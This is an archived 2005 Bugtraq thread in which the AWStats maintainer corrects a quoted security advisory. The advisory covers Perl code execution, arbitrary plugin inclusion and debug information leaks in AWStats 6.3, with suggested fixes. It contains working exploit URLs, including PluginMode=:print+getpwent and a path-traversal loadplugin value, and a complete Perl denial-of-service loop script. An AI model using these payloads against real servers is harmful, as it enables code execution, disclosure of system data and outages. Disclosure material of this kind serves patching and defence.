lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 3 May 2005 22:26:44 -0000
From: Laurent Destailleur <eldy@...rs.sourceforge.net>
To: bugtraq@...urityfocus.com
Subject: Re: AWStats <= 6.4 Multiple vulnerabilities


In-Reply-To: <20050214081040.3370.qmail@....securityfocus.com>

>Received: (qmail 16782 invoked from network); 14 Feb 2005 18:00:47 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
>  by mail.securityfocus.com with SMTP; 14 Feb 2005 18:00:47 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>	by outgoing3.securityfocus.com (Postfix) with QMQP
>	id 01F1F236F68; Mon, 14 Feb 2005 10:27:21 -0700 (MST)
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>Received: (qmail 27084 invoked from network); 14 Feb 2005 00:57:36 -0000
>Date: 14 Feb 2005 08:10:40 -0000
>Message-ID: <20050214081040.3370.qmail@....securityfocus.com>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: GHC@....securityfocus.com,
>	[ru]@securityfocus.com@....securityfocus.com <foster@....ru>
>To: bugtraq@...urityfocus.com
>Subject: AWStats <= 6.4 Multiple vulnerabilities
>

Must read AWStats <= 6.3. Version 6.4 is not affected.

>
>
>/*==========================================*/
>// GHC -> AWStats <- ADVISORY
>\\ PRODUCT: AWStats      
>// VERSION: <= 6.3
>\\ URL: http://awstats.sourceforge.net/
>// VULNERABILITY CLASS: Multiple vulnerabilities
>\\ RISK: high
>/*==========================================*/
>
>[Product Description]
>"AWStats is a free powerful tool that generates advanced web, ftp or mail server statistics, graphically. 
>This log analyzer works as a CGI or from command line and shows you all possible information your log contains, 
>in few graphical web pages". 
>Current stable version: AWStats 6.3 final  
>Development version is 6.4 - 2005-02-06 14:31

Version 6.4 release is not affected.

>
>[Summary]
>Successful exploitation of an input validation vulnerability in AWStats scripts
>allows attackers to execute limited perl directives under the privileges of
>the web server, get sensetive information. 
>Some actions of the attacker can lead to denial of service.
>
>[Details]
>Some AWStats's functions can be extended with plugins.
>Two variables (loadplugin & pluginmode) are dealing with it. 
>The first one (loadplugin) is responsible for plugins list (plugin1, plugin2); the second one
>runs plugin's functions. 
>
>Exploitable example (raw log plugin):
>http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog  
>
>Server answer:
>192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css HTTP/1.1" 200 2986
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 200 7710
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/logo.gif HTTP/1.1" 200 14443
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200 429
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1" 200 2532
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/vcss.gif HTTP/1.1" 200 1547
>192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 200 7333
>192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1" 200 7588
>192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1" 200 7910
>192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 7340
>192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200 153    
>
>The dangerous fact is that attacker can read sensitive information such as
>IP address, admin scripts names, non encoded GET queries, etc. 
>
>Our variables pass some verification (as others), but it is not enough for security:
>
>sub Sanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
> return $stringtoclean;
>}
>
>Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol. 
>It's enough for variables with path to configuration files, but not for plugin tasks.
>In case of "loadplugin" & "pluginmode" developers obviously have a lot of trust to the user.
>
>So, let's see what can be done, in fact.
>
>[1] Perl code execution.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>we'll get the action in next piece of code:
>
># AWStats output is replaced by a plugin output
>if ($PluginMode) {
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
> if ($? || $@) { error("$@"); }
> &html_end(0);
> exit 0;
>}
>
>If variable exists, we'll get code execution. This happens after sanitizing (see privious).
>Here we have intresting part in:
>     my $function="BuildFullHTMLOutput_$PluginMode()";
>     eval("$function");
>
>This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from
>rawlog.pm plugin).
>Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
>But if we won't specify the name of module (with "loadplugin" parameter) we'll get the next:
>
>main::BuildFullHTMLOutput_"function name"().
>
>By the way, there is permited symbol ':' in user input parameters. So, we can send:
>
>PluginMode=:print+getpwent
>
>And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>This will satisfy eval() requirements., and :print getpwent() is executed.
>
>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>Sanitazing limits user's input, but there is no filtration for call sympols '()'.
>Here we can see that somebody can perform DoS attack. 
>This is example of simple code for successful DoS exploitation:
>
>#!/usr/bin/perl
>
>use IO::Socket;
>$server = 'www.example.com';
>sub ConnectServer {
> $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
> || die "Error\n";
> print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
> print $socket "Host: $server\n";
> print $socket "Accept: */*\n";
> print $socket "\n\n";
>}
>
>while () {
> $rp = rand;
> &ConnectServer;
>}
>
>[BUGFIX]
>Change vulnerable code for:
> 
>sub PluginSanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w]//g;
> return $stringtoclean;
>}
>
>
>[2] Arbitrary plugin including.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
>
>Arbitrary module from user's input through "loadplugin" parameter can be included with  "require" function..
>
>Bugfix - as above or something like this:
>
>opendir (PDIR, './plugins');
>@FilesPDIR = readdir(PDIR);
>closedir (PDIR);
>foreach $FilesPName (@FilesPDIR) {
> if ($FilesPName =~ m/$loadplugin/) {
> }
>}
>
>The good thing is the poison null-byte (%00) has no place (transferes to 00).
>
>[3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).
>Every user can access debug function:
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
>                                                                 
>
>[DISCLOSURE TIMELINE]
>
>10-02-2005  Initial vendor notification.
>14-02-2005  No response.
>14-02-2005  Bug-traq post.             
>
>/* ================================================== */
>/* www.ghc.ru -- security games & challenges          */
>/* ================================================== */
>/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
>/* Special respect to e-defense.                      */
>/* ================================================== */
>


Powered by blists - more mailing lists